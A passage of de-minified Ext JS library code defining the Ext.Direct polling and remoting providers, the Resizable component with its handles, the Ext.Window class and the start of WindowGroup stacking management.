var d = new Ext.Direct.ExceptionEvent({data:h, xhr:j, code:Ext.Direct.exceptions.PARSE, message:"Error parsing json response: \n\n " + g});
return[d]
}
var c = [];
if (Ext.isArray(g)) {
for (var b = 0, a = g.length; b < a; b++) {
c.push(Ext.Direct.createEvent(g[b]))
}
} else {
c.push(Ext.Direct.createEvent(g))
}
return c
}});
Ext.direct.PollingProvider = Ext.extend(Ext.direct.JsonProvider, {priority:3, interval:3000, constructor:function (a) {
Ext.direct.PollingProvider.superclass.constructor.call(this, a);
this.addEvents("beforepoll", "poll")
}, isConnected:function () {
return !!this.pollTask
}, connect:function () {
if (this.url && !this.pollTask) {
this.pollTask = Ext.TaskMgr.start({run:function () {
if (this.fireEvent("beforepoll", this) !== false) {
if (typeof this.url == "function") {
this.url(this.baseParams)
} else {
Ext.Ajax.request({url:this.url, callback:this.onData, scope:this, params:this.baseParams})
}
}
}, interval:this.interval, scope:this});
this.fireEvent("connect", this)
} else {
if (!this.url) {
throw"Error initializing PollingProvider, no url configured."
}
}
}, disconnect:function () {
if (this.pollTask) {
Ext.TaskMgr.stop(this.pollTask);
delete this.pollTask;
this.fireEvent("disconnect", this)
}
}, onData:function (d, j, h) {
if (j) {
var c = this.getEvents(h);
for (var b = 0, a = c.length; b < a; b++) {
var g = c[b];
this.fireEvent("data", this, g)
}
} else {
var g = new Ext.Direct.ExceptionEvent({data:g, code:Ext.Direct.exceptions.TRANSPORT, message:"Unable to connect to the server.", xhr:h});
this.fireEvent("data", this, g)
}
}});
Ext.Direct.PROVIDERS.polling = Ext.direct.PollingProvider;
Ext.direct.RemotingProvider = Ext.extend(Ext.direct.JsonProvider, {enableBuffer:10, maxRetries:1, timeout:undefined, constructor:function (a) {
Ext.direct.RemotingProvider.superclass.constructor.call(this, a);
this.addEvents("beforecall", "call");
this.namespace = (Ext.isString(this.namespace)) ? Ext.ns(this.namespace) : this.namespace || window;
this.transactions = {};
this.callBuffer = []
}, initAPI:function () {
var h = this.actions;
for (var j in h) {
var d = this.namespace[j] || (this.namespace[j] = {}), e = h[j];
for (var g = 0, b = e.length; g < b; g++) {
var a = e[g];
d[a.name] = this.createMethod(j, a)
}
}
}, isConnected:function () {
return !!this.connected
}, connect:function () {
if (this.url) {
this.initAPI();
this.connected = true;
this.fireEvent("connect", this)
} else {
if (!this.url) {
throw"Error initializing RemotingProvider, no url configured."
}
}
}, disconnect:function () {
if (this.connected) {
this.connected = false;
this.fireEvent("disconnect", this)
}
}, onData:function (a, h, j) {
if (h) {
var k = this.getEvents(j);
for (var b = 0, c = k.length; b < c; b++) {
var d = k[b], l = this.getTransaction(d);
this.fireEvent("data", this, d);
if (l) {
this.doCallback(l, d, true);
Ext.Direct.removeTransaction(l)
}
}
} else {
var g = [].concat(a.ts);
for (var b = 0, c = g.length; b < c; b++) {
var l = this.getTransaction(g[b]);
if (l && l.retryCount < this.maxRetries) {
l.retry()
} else {
var d = new Ext.Direct.ExceptionEvent({data:d, transaction:l, code:Ext.Direct.exceptions.TRANSPORT, message:"Unable to connect to the server.", xhr:j});
this.fireEvent("data", this, d);
if (l) {
this.doCallback(l, d, false);
Ext.Direct.removeTransaction(l)
}
}
}
}
}, getCallData:function (a) {
return{action:a.action, method:a.method, data:a.data, type:"rpc", tid:a.tid}
}, doSend:function (d) {
var g = {url:this.url, callback:this.onData, scope:this, ts:d, timeout:this.timeout}, b;
if (Ext.isArray(d)) {
b = [];
for (var c = 0, a = d.length; c < a; c++) {
b.push(this.getCallData(d[c]))
}
} else {
b = this.getCallData(d)
}
if (this.enableUrlEncode) {
var e = {};
e[Ext.isString(this.enableUrlEncode) ? this.enableUrlEncode : "data"] = Ext.encode(b);
g.params = e
} else {
g.jsonData = b
}
Ext.Ajax.request(g)
}, combineAndSend:function () {
var a = this.callBuffer.length;
if (a > 0) {
this.doSend(a == 1 ? this.callBuffer[0] : this.callBuffer);
this.callBuffer = []
}
}, queueTransaction:function (a) {
if (a.form) {
this.processForm(a);
return
}
this.callBuffer.push(a);
if (this.enableBuffer) {
if (!this.callTask) {
this.callTask = new Ext.util.DelayedTask(this.combineAndSend, this)
}
this.callTask.delay(Ext.isNumber(this.enableBuffer) ? this.enableBuffer : 10)
} else {
this.combineAndSend()
}
}, doCall:function (i, a, b) {
var h = null, e = b[a.len], g = b[a.len + 1];
if (a.len !== 0) {
h = b.slice(0, a.len)
}
var d = new Ext.Direct.Transaction({provider:this, args:b, action:i, method:a.name, data:h, cb:g && Ext.isFunction(e) ? e.createDelegate(g) : e});
if (this.fireEvent("beforecall", this, d, a) !== false) {
Ext.Direct.addTransaction(d);
this.queueTransaction(d);
this.fireEvent("call", this, d, a)
}
}, doForm:function (j, b, g, i, e) {
var d = new Ext.Direct.Transaction({provider:this, action:j, method:b.name, args:[g, i, e], cb:e && Ext.isFunction(i) ? i.createDelegate(e) : i, isForm:true});
if (this.fireEvent("beforecall", this, d, b) !== false) {
Ext.Direct.addTransaction(d);
var a = String(g.getAttribute("enctype")).toLowerCase() == "multipart/form-data", h = {extTID:d.tid, extAction:j, extMethod:b.name, extType:"rpc", extUpload:String(a)};
Ext.apply(d, {form:Ext.getDom(g), isUpload:a, params:i && Ext.isObject(i.params) ? Ext.apply(h, i.params) : h});
this.fireEvent("call", this, d, b);
this.processForm(d)
}
}, processForm:function (a) {
Ext.Ajax.request({url:this.url, params:a.params, callback:this.onData, scope:this, form:a.form, isUpload:a.isUpload, ts:a})
}, createMethod:function (d, a) {
var b;
if (!a.formHandler) {
b = function () {
this.doCall(d, a, Array.prototype.slice.call(arguments, 0))
}.createDelegate(this)
} else {
b = function (e, g, c) {
this.doForm(d, a, e, g, c)
}.createDelegate(this)
}
b.directCfg = {action:d, method:a};
return b
}, getTransaction:function (a) {
return a && a.tid ? Ext.Direct.getTransaction(a.tid) : null
}, doCallback:function (c, g) {
var d = g.status ? "success" : "failure";
if (c && c.cb) {
var b = c.cb, a = Ext.isDefined(g.result) ? g.result : g.data;
if (Ext.isFunction(b)) {
b(a, g)
} else {
Ext.callback(b[d], b.scope, [a, g]);
Ext.callback(b.callback, b.scope, [a, g])
}
}
}});
Ext.Direct.PROVIDERS.remoting = Ext.direct.RemotingProvider;
Ext.Resizable = Ext.extend(Ext.util.Observable, {constructor:function (d, e) {
this.el = Ext.get(d);
if (e && e.wrap) {
e.resizeChild = this.el;
this.el = this.el.wrap(typeof e.wrap == "object" ? e.wrap : {cls:"xresizable-wrap"});
this.el.id = this.el.dom.id = e.resizeChild.id + "-rzwrap";
this.el.setStyle("overflow", "hidden");
this.el.setPositioning(e.resizeChild.getPositioning());
e.resizeChild.clearPositioning();
if (!e.width || !e.height) {
var g = e.resizeChild.getSize();
this.el.setSize(g.width, g.height)
}
if (e.pinned && !e.adjustments) {
e.adjustments = "auto"
}
}
this.proxy = this.el.createProxy({tag:"div", cls:"x-resizable-proxy", id:this.el.id + "-rzproxy"}, Ext.getBody());
this.proxy.unselectable();
this.proxy.enableDisplayMode("block");
Ext.apply(this, e);
if (this.pinned) {
this.disableTrackOver = true;
this.el.addClass("x-resizable-pinned")
}
var k = this.el.getStyle("position");
if (k != "absolute" && k != "fixed") {
this.el.setStyle("position", "relative")
}
if (!this.handles) {
this.handles = "s,e,se";
if (this.multiDirectional) {
this.handles += ",n,w"
}
}
if (this.handles == "all") {
this.handles = "n s e w ne nw se sw"
}
var o = this.handles.split(/\s*?[,;]\s*?| /);
var c = Ext.Resizable.positions;
for (var j = 0, l = o.length; j < l; j++) {
if (o[j] && c[o[j]]) {
var n = c[o[j]];
this[n] = new Ext.Resizable.Handle(this, n, this.disableTrackOver, this.transparent, this.handleCls)
}
}
this.corner = this.southeast;
if (this.handles.indexOf("n") != -1 || this.handles.indexOf("w") != -1) {
this.updateBox = true
}
this.activeHandle = null;
if (this.resizeChild) {
if (typeof this.resizeChild == "boolean") {
this.resizeChild = Ext.get(this.el.dom.firstChild, true)
} else {
this.resizeChild = Ext.get(this.resizeChild, true)
}
}
if (this.adjustments == "auto") {
var b = this.resizeChild;
var m = this.west, h = this.east, a = this.north, o = this.south;
if (b && (m || a)) {
b.position("relative");
b.setLeft(m ? m.el.getWidth() : 0);
b.setTop(a ? a.el.getHeight() : 0)
}
this.adjustments = [(h ? -h.el.getWidth() : 0) + (m ? -m.el.getWidth() : 0), (a ? -a.el.getHeight() : 0) + (o ? -o.el.getHeight() : 0) - 1]
}
if (this.draggable) {
this.dd = this.dynamic ? this.el.initDD(null) : this.el.initDDProxy(null, {dragElId:this.proxy.id});
this.dd.setHandleElId(this.resizeChild ? this.resizeChild.id : this.el.id);
if (this.constrainTo) {
this.dd.constrainTo(this.constrainTo)
}
}
this.addEvents("beforeresize", "resize");
if (this.width !== null && this.height !== null) {
this.resizeTo(this.width, this.height)
} else {
this.updateChildSize()
}
if (Ext.isIE) {
this.el.dom.style.zoom = 1
}
Ext.Resizable.superclass.constructor.call(this)
}, adjustments:[0, 0], animate:false, disableTrackOver:false, draggable:false, duration:0.35, dynamic:false, easing:"easeOutStrong", enabled:true, handles:false, multiDirectional:false, height:null, width:null, heightIncrement:0, widthIncrement:0, minHeight:5, minWidth:5, maxHeight:10000, maxWidth:10000, minX:0, minY:0, pinned:false, preserveRatio:false, resizeChild:false, transparent:false, resizeTo:function (b, a) {
this.el.setSize(b, a);
this.updateChildSize();
this.fireEvent("resize", this, b, a, null)
}, startSizing:function (c, b) {
this.fireEvent("beforeresize", this, c);
if (this.enabled) {
if (!this.overlay) {
this.overlay = this.el.createProxy({tag:"div", cls:"x-resizable-overlay", html:" "}, Ext.getBody());
this.overlay.unselectable();
this.overlay.enableDisplayMode("block");
this.overlay.on({scope:this, mousemove:this.onMouseMove, mouseup:this.onMouseUp})
}
this.overlay.setStyle("cursor", b.el.getStyle("cursor"));
this.resizing = true;
this.startBox = this.el.getBox();
this.startPoint = c.getXY();
this.offsets = [(this.startBox.x + this.startBox.width) - this.startPoint[0], (this.startBox.y + this.startBox.height) - this.startPoint[1]];
this.overlay.setSize(Ext.lib.Dom.getViewWidth(true), Ext.lib.Dom.getViewHeight(true));
this.overlay.show();
if (this.constrainTo) {
var a = Ext.get(this.constrainTo);
this.resizeRegion = a.getRegion().adjust(a.getFrameWidth("t"), a.getFrameWidth("l"), -a.getFrameWidth("b"), -a.getFrameWidth("r"))
}
this.proxy.setStyle("visibility", "hidden");
this.proxy.show();
this.proxy.setBox(this.startBox);
if (!this.dynamic) {
this.proxy.setStyle("visibility", "visible")
}
}
}, onMouseDown:function (a, b) {
if (this.enabled) {
b.stopEvent();
this.activeHandle = a;
this.startSizing(b, a)
}
}, onMouseUp:function (b) {
this.activeHandle = null;
var a = this.resizeElement();
this.resizing = false;
this.handleOut();
this.overlay.hide();
this.proxy.hide();
this.fireEvent("resize", this, a.width, a.height, b)
}, updateChildSize:function () {
if (this.resizeChild) {
var d = this.el;
var e = this.resizeChild;
var c = this.adjustments;
if (d.dom.offsetWidth) {
var a = d.getSize(true);
e.setSize(a.width + c[0], a.height + c[1])
}
if (Ext.isIE) {
setTimeout(function () {
if (d.dom.offsetWidth) {
var g = d.getSize(true);
e.setSize(g.width + c[0], g.height + c[1])
}
}, 10)
}
}
}, snap:function (c, e, b) {
if (!e || !c) {
return c
}
var d = c;
var a = c % e;
if (a > 0) {
if (a > (e / 2)) {
d = c + (e - a)
} else {
d = c - a
}
}
return Math.max(b, d)
}, resizeElement:function () {
var a = this.proxy.getBox();
if (this.updateBox) {
this.el.setBox(a, false, this.animate, this.duration, null, this.easing)
} else {
this.el.setSize(a.width, a.height, this.animate, this.duration, null, this.easing)
}
this.updateChildSize();
if (!this.dynamic) {
this.proxy.hide()
}
if (this.draggable && this.constrainTo) {
this.dd.resetConstraints();
this.dd.constrainTo(this.constrainTo)
}
return a
}, constrain:function (b, c, a, d) {
if (b - c < a) {
c = b - a
} else {
if (b - c > d) {
c = b - d
}
}
return c
}, onMouseMove:function (z) {
if (this.enabled && this.activeHandle) {
try {
if (this.resizeRegion && !this.resizeRegion.contains(z.getPoint())) {
return
}
var t = this.curSize || this.startBox, l = this.startBox.x, k = this.startBox.y, c = l, b = k, m = t.width, u = t.height, d = m, o = u, n = this.minWidth, A = this.minHeight, s = this.maxWidth, D = this.maxHeight, i = this.widthIncrement, a = this.heightIncrement, B = z.getXY(), r = -(this.startPoint[0] - Math.max(this.minX, B[0])), p = -(this.startPoint[1] - Math.max(this.minY, B[1])), j = this.activeHandle.position, E, g;
switch (j) {
case"east":
m += r;
m = Math.min(Math.max(n, m), s);
break;
case"south":
u += p;
u = Math.min(Math.max(A, u), D);
break;
case"southeast":
m += r;
u += p;
m = Math.min(Math.max(n, m), s);
u = Math.min(Math.max(A, u), D);
break;
case"north":
p = this.constrain(u, p, A, D);
k += p;
u -= p;
break;
case"west":
r = this.constrain(m, r, n, s);
l += r;
m -= r;
break;
case"northeast":
m += r;
m = Math.min(Math.max(n, m), s);
p = this.constrain(u, p, A, D);
k += p;
u -= p;
break;
case"northwest":
r = this.constrain(m, r, n, s);
p = this.constrain(u, p, A, D);
k += p;
u -= p;
l += r;
m -= r;
break;
case"southwest":
r = this.constrain(m, r, n, s);
u += p;
u = Math.min(Math.max(A, u), D);
l += r;
m -= r;
break
}
var q = this.snap(m, i, n);
var C = this.snap(u, a, A);
if (q != m || C != u) {
switch (j) {
case"northeast":
k -= C - u;
break;
case"north":
k -= C - u;
break;
case"southwest":
l -= q - m;
break;
case"west":
l -= q - m;
break;
case"northwest":
l -= q - m;
k -= C - u;
break
}
m = q;
u = C
}
if (this.preserveRatio) {
switch (j) {
case"southeast":
case"east":
u = o * (m / d);
u = Math.min(Math.max(A, u), D);
m = d * (u / o);
break;
case"south":
m = d * (u / o);
m = Math.min(Math.max(n, m), s);
u = o * (m / d);
break;
case"northeast":
m = d * (u / o);
m = Math.min(Math.max(n, m), s);
u = o * (m / d);
break;
case"north":
E = m;
m = d * (u / o);
m = Math.min(Math.max(n, m), s);
u = o * (m / d);
l += (E - m) / 2;
break;
case"southwest":
u = o * (m / d);
u = Math.min(Math.max(A, u), D);
E = m;
m = d * (u / o);
l += E - m;
break;
case"west":
g = u;
u = o * (m / d);
u = Math.min(Math.max(A, u), D);
k += (g - u) / 2;
E = m;
m = d * (u / o);
l += E - m;
break;
case"northwest":
E = m;
g = u;
u = o * (m / d);
u = Math.min(Math.max(A, u), D);
m = d * (u / o);
k += g - u;
l += E - m;
break
}
}
this.proxy.setBounds(l, k, m, u);
if (this.dynamic) {
this.resizeElement()
}
} catch (v) {
}
}
}, handleOver:function () {
if (this.enabled) {
this.el.addClass("x-resizable-over")
}
}, handleOut:function () {
if (!this.resizing) {
this.el.removeClass("x-resizable-over")
}
}, getEl:function () {
return this.el
}, getResizeChild:function () {
return this.resizeChild
}, destroy:function (b) {
Ext.destroy(this.dd, this.overlay, this.proxy);
this.overlay = null;
this.proxy = null;
var c = Ext.Resizable.positions;
for (var a in c) {
if (typeof c[a] != "function" && this[c[a]]) {
this[c[a]].destroy()
}
}
if (b) {
this.el.update("");
Ext.destroy(this.el);
this.el = null
}
this.purgeListeners()
}, syncHandleHeight:function () {
var a = this.el.getHeight(true);
if (this.west) {
this.west.el.setHeight(a)
}
if (this.east) {
this.east.el.setHeight(a)
}
}});
Ext.Resizable.positions = {n:"north", s:"south", e:"east", w:"west", se:"southeast", sw:"southwest", nw:"northwest", ne:"northeast"};
Ext.Resizable.Handle = Ext.extend(Object, {constructor:function (d, g, c, e, a) {
if (!this.tpl) {
var b = Ext.DomHelper.createTemplate({tag:"div", cls:"x-resizable-handle x-resizable-handle-{0}"});
b.compile();
Ext.Resizable.Handle.prototype.tpl = b
}
this.position = g;
this.rz = d;
this.el = this.tpl.append(d.el.dom, [this.position], true);
this.el.unselectable();
if (e) {
this.el.setOpacity(0)
}
if (!Ext.isEmpty(a)) {
this.el.addClass(a)
}
this.el.on("mousedown", this.onMouseDown, this);
if (!c) {
this.el.on({scope:this, mouseover:this.onMouseOver, mouseout:this.onMouseOut})
}
}, afterResize:function (a) {
}, onMouseDown:function (a) {
this.rz.onMouseDown(this, a)
}, onMouseOver:function (a) {
this.rz.handleOver(this, a)
}, onMouseOut:function (a) {
this.rz.handleOut(this, a)
}, destroy:function () {
Ext.destroy(this.el);
this.el = null
}});
Ext.Window = Ext.extend(Ext.Panel, {baseCls:"x-window", resizable:true, draggable:true, closable:true, closeAction:"close", constrain:false, constrainHeader:false, plain:false, minimizable:false, maximizable:false, minHeight:100, minWidth:200, expandOnShow:true, showAnimDuration:0.25, hideAnimDuration:0.25, collapsible:false, initHidden:undefined, hidden:true, elements:"header,body", frame:true, floating:true, initComponent:function () {
this.initTools();
Ext.Window.superclass.initComponent.call(this);
this.addEvents("resize", "maximize", "minimize", "restore");
if (Ext.isDefined(this.initHidden)) {
this.hidden = this.initHidden
}
if (this.hidden === false) {
this.hidden = true;
this.show()
}
}, getState:function () {
return Ext.apply(Ext.Window.superclass.getState.call(this) || {}, this.getBox(true))
}, onRender:function (b, a) {
Ext.Window.superclass.onRender.call(this, b, a);
if (this.plain) {
this.el.addClass("x-window-plain")
}
this.focusEl = this.el.createChild({tag:"a", href:"#", cls:"x-dlg-focus", tabIndex:"-1", html:" "});
this.focusEl.swallowEvent("click", true);
this.proxy = this.el.createProxy("x-window-proxy");
this.proxy.enableDisplayMode("block");
if (this.modal) {
this.mask = this.container.createChild({cls:"ext-el-mask"}, this.el.dom);
this.mask.enableDisplayMode("block");
this.mask.hide();
this.mon(this.mask, "click", this.focus, this)
}
if (this.maximizable) {
this.mon(this.header, "dblclick", this.toggleMaximize, this)
}
}, initEvents:function () {
Ext.Window.superclass.initEvents.call(this);
if (this.animateTarget) {
this.setAnimateTarget(this.animateTarget)
}
if (this.resizable) {
this.resizer = new Ext.Resizable(this.el, {minWidth:this.minWidth, minHeight:this.minHeight, handles:this.resizeHandles || "all", pinned:true, resizeElement:this.resizerAction, handleCls:"x-window-handle"});
this.resizer.window = this;
this.mon(this.resizer, "beforeresize", this.beforeResize, this)
}
if (this.draggable) {
this.header.addClass("x-window-draggable")
}
this.mon(this.el, "mousedown", this.toFront, this);
this.manager = this.manager || Ext.WindowMgr;
this.manager.register(this);
if (this.maximized) {
this.maximized = false;
this.maximize()
}
if (this.closable) {
var a = this.getKeyMap();
a.on(27, this.onEsc, this);
a.disable()
}
}, initDraggable:function () {
this.dd = new Ext.Window.DD(this)
}, onEsc:function (a, b) {
if (this.activeGhost) {
this.unghost()
}
b.stopEvent();
this[this.closeAction]()
}, beforeDestroy:function () {
if (this.rendered) {
this.hide();
this.clearAnchor();
Ext.destroy(this.focusEl, this.resizer, this.dd, this.proxy, this.mask)
}
Ext.Window.superclass.beforeDestroy.call(this)
}, onDestroy:function () {
if (this.manager) {
this.manager.unregister(this)
}
Ext.Window.superclass.onDestroy.call(this)
}, initTools:function () {
if (this.minimizable) {
this.addTool({id:"minimize", handler:this.minimize.createDelegate(this, [])})
}
if (this.maximizable) {
this.addTool({id:"maximize", handler:this.maximize.createDelegate(this, [])});
this.addTool({id:"restore", handler:this.restore.createDelegate(this, []), hidden:true})
}
if (this.closable) {
this.addTool({id:"close", handler:this[this.closeAction].createDelegate(this, [])})
}
}, resizerAction:function () {
var a = this.proxy.getBox();
this.proxy.hide();
this.window.handleResize(a);
return a
}, beforeResize:function () {
this.resizer.minHeight = Math.max(this.minHeight, this.getFrameHeight() + 40);
this.resizer.minWidth = Math.max(this.minWidth, this.getFrameWidth() + 40);
this.resizeBox = this.el.getBox()
}, updateHandles:function () {
if (Ext.isIE && this.resizer) {
this.resizer.syncHandleHeight();
this.el.repaint()
}
}, handleResize:function (b) {
var a = this.resizeBox;
if (a.x != b.x || a.y != b.y) {
this.updateBox(b)
} else {
this.setSize(b);
if (Ext.isIE6 && Ext.isStrict) {
this.doLayout()
}
}
this.focus();
this.updateHandles();
this.saveState()
}, focus:function () {
var e = this.focusEl, a = this.defaultButton, c = typeof a, d, b;
if (Ext.isDefined(a)) {
if (Ext.isNumber(a) && this.fbar) {
e = this.fbar.items.get(a)
} else {
if (Ext.isString(a)) {
e = Ext.getCmp(a)
} else {
e = a
}
}
d = e.getEl();
b = Ext.getDom(this.container);
if (d && b) {
if (b != document.body && !Ext.lib.Region.getRegion(b).contains(Ext.lib.Region.getRegion(d.dom))) {
return
}
}
}
e = e || this.focusEl;
e.focus.defer(10, e)
}, setAnimateTarget:function (a) {
a = Ext.get(a);
this.animateTarget = a
}, beforeShow:function () {
delete this.el.lastXY;
delete this.el.lastLT;
if (this.x === undefined || this.y === undefined) {
var a = this.el.getAlignToXY(this.container, "c-c");
var b = this.el.translatePoints(a[0], a[1]);
this.x = this.x === undefined ? b.left : this.x;
this.y = this.y === undefined ? b.top : this.y
}
this.el.setLeftTop(this.x, this.y);
if (this.expandOnShow) {
this.expand(false)
}
if (this.modal) {
Ext.getBody().addClass("x-body-masked");
this.mask.setSize(Ext.lib.Dom.getViewWidth(true), Ext.lib.Dom.getViewHeight(true));
this.mask.show()
}
}, show:function (c, a, b) {
if (!this.rendered) {
this.render(Ext.getBody())
}
if (this.hidden === false) {
this.toFront();
return this
}
if (this.fireEvent("beforeshow", this) === false) {
return this
}
if (a) {
this.on("show", a, b, {single:true})
}
this.hidden = false;
if (Ext.isDefined(c)) {
this.setAnimateTarget(c)
}
this.beforeShow();
if (this.animateTarget) {
this.animShow()
} else {
this.afterShow()
}
return this
}, afterShow:function (b) {
if (this.isDestroyed) {
return false
}
this.proxy.hide();
this.el.setStyle("display", "block");
this.el.show();
if (this.maximized) {
this.fitContainer()
}
if (Ext.isMac && Ext.isGecko2) {
this.cascade(this.setAutoScroll)
}
if (this.monitorResize || this.modal || this.constrain || this.constrainHeader) {
Ext.EventManager.onWindowResize(this.onWindowResize, this)
}
this.doConstrain();
this.doLayout();
if (this.keyMap) {
this.keyMap.enable()
}
this.toFront();
this.updateHandles();
if (b && (Ext.isIE || Ext.isWebKit)) {
var a = this.getSize();
this.onResize(a.width, a.height)
}
this.onShow();
this.fireEvent("show", this)
}, animShow:function () {
this.proxy.show();
this.proxy.setBox(this.animateTarget.getBox());
this.proxy.setOpacity(0);
var a = this.getBox();
this.el.setStyle("display", "none");
this.proxy.shift(Ext.apply(a, {callback:this.afterShow.createDelegate(this, [true], false), scope:this, easing:"easeNone", duration:this.showAnimDuration, opacity:0.5}))
}, hide:function (c, a, b) {
if (this.hidden || this.fireEvent("beforehide", this) === false) {
return this
}
if (a) {
this.on("hide", a, b, {single:true})
}
this.hidden = true;
if (c !== undefined) {
this.setAnimateTarget(c)
}
if (this.modal) {
this.mask.hide();
Ext.getBody().removeClass("x-body-masked")
}
if (this.animateTarget) {
this.animHide()
} else {
this.el.hide();
this.afterHide()
}
return this
}, afterHide:function () {
this.proxy.hide();
if (this.monitorResize || this.modal || this.constrain || this.constrainHeader) {
Ext.EventManager.removeResizeListener(this.onWindowResize, this)
}
if (this.keyMap) {
this.keyMap.disable()
}
this.onHide();
this.fireEvent("hide", this)
}, animHide:function () {
this.proxy.setOpacity(0.5);
this.proxy.show();
var a = this.getBox(false);
this.proxy.setBox(a);
this.el.hide();
this.proxy.shift(Ext.apply(this.animateTarget.getBox(), {callback:this.afterHide, scope:this, duration:this.hideAnimDuration, easing:"easeNone", opacity:0}))
}, onShow:Ext.emptyFn, onHide:Ext.emptyFn, onWindowResize:function () {
if (this.maximized) {
this.fitContainer()
}
if (this.modal) {
this.mask.setSize("100%", "100%");
var a = this.mask.dom.offsetHeight;
this.mask.setSize(Ext.lib.Dom.getViewWidth(true), Ext.lib.Dom.getViewHeight(true))
}
this.doConstrain()
}, doConstrain:function () {
if (this.constrain || this.constrainHeader) {
var b;
if (this.constrain) {
b = {right:this.el.shadowOffset, left:this.el.shadowOffset, bottom:this.el.shadowOffset}
} else {
var a = this.getSize();
b = {right:-(a.width - 100), bottom:-(a.height - 25 + this.el.getConstrainOffset())}
}
var c = this.el.getConstrainToXY(this.container, true, b);
if (c) {
this.setPosition(c[0], c[1])
}
}
}, ghost:function (a) {
var c = this.createGhost(a);
var b = this.getBox(true);
c.setLeftTop(b.x, b.y);
c.setWidth(b.width);
this.el.hide();
this.activeGhost = c;
return c
}, unghost:function (b, a) {
if (!this.activeGhost) {
return
}
if (b !== false) {
this.el.show();
this.focus.defer(10, this);
if (Ext.isMac && Ext.isGecko2) {
this.cascade(this.setAutoScroll)
}
}
if (a !== false) {
this.setPosition(this.activeGhost.getLeft(true), this.activeGhost.getTop(true))
}
this.activeGhost.hide();
this.activeGhost.remove();
delete this.activeGhost
}, minimize:function () {
this.fireEvent("minimize", this);
return this
}, close:function () {
if (this.fireEvent("beforeclose", this) !== false) {
if (this.hidden) {
this.doClose()
} else {
this.hide(null, this.doClose, this)
}
}
}, doClose:function () {
this.fireEvent("close", this);
this.destroy()
}, maximize:function () {
if (!this.maximized) {
this.expand(false);
this.restoreSize = this.getSize();
this.restorePos = this.getPosition(true);
if (this.maximizable) {
this.tools.maximize.hide();
this.tools.restore.show()
}
this.maximized = true;
this.el.disableShadow();
if (this.dd) {
this.dd.lock()
}
if (this.collapsible) {
this.tools.toggle.hide()
}
this.el.addClass("x-window-maximized");
this.container.addClass("x-window-maximized-ct");
this.setPosition(0, 0);
this.fitContainer();
this.fireEvent("maximize", this)
}
return this
}, restore:function () {
if (this.maximized) {
var a = this.tools;
this.el.removeClass("x-window-maximized");
if (a.restore) {
a.restore.hide()
}
if (a.maximize) {
a.maximize.show()
}
this.setPosition(this.restorePos[0], this.restorePos[1]);
this.setSize(this.restoreSize.width, this.restoreSize.height);
delete this.restorePos;
delete this.restoreSize;
this.maximized = false;
this.el.enableShadow(true);
if (this.dd) {
this.dd.unlock()
}
if (this.collapsible && a.toggle) {
a.toggle.show()
}
this.container.removeClass("x-window-maximized-ct");
this.doConstrain();
this.fireEvent("restore", this)
}
return this
}, toggleMaximize:function () {
return this[this.maximized ? "restore" : "maximize"]()
}, fitContainer:function () {
var a = this.container.getViewSize(false);
this.setSize(a.width, a.height)
}, setZIndex:function (a) {
if (this.modal) {
this.mask.setStyle("z-index", a)
}
this.el.setZIndex(++a);
a += 5;
if (this.resizer) {
this.resizer.proxy.setStyle("z-index", ++a)
}
this.lastZIndex = a
}, alignTo:function (b, a, c) {
var d = this.el.getAlignToXY(b, a, c);
this.setPagePosition(d[0], d[1]);
return this
}, anchorTo:function (c, e, d, b) {
this.clearAnchor();
this.anchorTarget = {el:c, alignment:e, offsets:d};
Ext.EventManager.onWindowResize(this.doAnchor, this);
var a = typeof b;
if (a != "undefined") {
Ext.EventManager.on(window, "scroll", this.doAnchor, this, {buffer:a == "number" ? b : 50})
}
return this.doAnchor()
}, doAnchor:function () {
var a = this.anchorTarget;
this.alignTo(a.el, a.alignment, a.offsets);
return this
}, clearAnchor:function () {
if (this.anchorTarget) {
Ext.EventManager.removeResizeListener(this.doAnchor, this);
Ext.EventManager.un(window, "scroll", this.doAnchor, this);
delete this.anchorTarget
}
return this
}, toFront:function (a) {
if (this.manager.bringToFront(this)) {
if (!a || !a.getTarget().focus) {
this.focus()
}
}
return this
}, setActive:function (a) {
if (a) {
if (!this.maximized) {
this.el.enableShadow(true)
}
this.fireEvent("activate", this)
} else {
this.el.disableShadow();
this.fireEvent("deactivate", this)
}
}, toBack:function () {
this.manager.sendToBack(this);
return this
}, center:function () {
var a = this.el.getAlignToXY(this.container, "c-c");
this.setPagePosition(a[0], a[1]);
return this
}});
Ext.reg("window", Ext.Window);
Ext.Window.DD = Ext.extend(Ext.dd.DD, {constructor:function (a) {
this.win = a;
Ext.Window.DD.superclass.constructor.call(this, a.el.id, "WindowDD-" + a.id);
this.setHandleElId(a.header.id);
this.scroll = false
}, moveOnly:true, headerOffsets:[100, 25], startDrag:function () {
var a = this.win;
this.proxy = a.ghost(a.initialConfig.cls);
if (a.constrain !== false) {
var c = a.el.shadowOffset;
this.constrainTo(a.container, {right:c, left:c, bottom:c})
} else {
if (a.constrainHeader !== false) {
var b = this.proxy.getSize();
this.constrainTo(a.container, {right:-(b.width - this.headerOffsets[0]), bottom:-(b.height - this.headerOffsets[1])})
}
}
}, b4Drag:Ext.emptyFn, onDrag:function (a) {
this.alignElWithMouse(this.proxy, a.getPageX(), a.getPageY())
}, endDrag:function (a) {
this.win.unghost();
this.win.saveState()
}});
Ext.WindowGroup = function () {
var g = {};
var d = [];
var e = null;
var c = function (j, i) {
return(!j._lastAccess || j._lastAccess < i._lastAccess) ? -1 : 1
};
var h = function () {
var l = d, j = l.length;
if (j > 0) {
l.sort(c);
var k = l[0].manager.zseed;
for (var m = 0; m < j; m++) {
var n = l[m];
if (n && !n.hidden) {
n.setZIndex(k + (m * 10))
}
}
}
a()
};
var b = function (i) {
if (i != e) {
if (e) {
e.setActive(false)
}
e = i;
if (i) {
i.setActive(true)
}
}
};
var a = function () {
for (var j = d.length - 1; j >= 0; --j) {
if (!d[j].hidden) {
b(d[j]);
return
}
}
b(null)
};
return{zseed:9000, register:function (i) {
if (i.manager) {
i.manager.unregister(i)
}
i.manager = this;
g[i.id] = i;
d.push(i);
i.on("hide", a)
}, unregister:function (i) {
delete i.manager;
delete g[i.id];
i.un("hide", a);
d.remove(i)
}, get:function (i) {
return typeof i == "object" ? i : g[i]
}, bringToFront:function (i) {
i = this.get(i);
if (i != e) {
i._lastAccess = new Date().getTime();
h();
return true
}
return false
}, sendToBack:function (i) {
i = this.get(i);
i._lastAccess = -(new Date().getTime());
h();
return i
}, hideAll:function () {
for (var i in g) {
if (g[i] && typeof g[i] != "function" && g[i].isVisible()) {
g[i].hide()
}
}
}, getActive:function () {
return e
}, getBy:function (l, k) {
var m = [];
for (var j = d.length - 1; j >= 0; --j) {
var n = d[j];
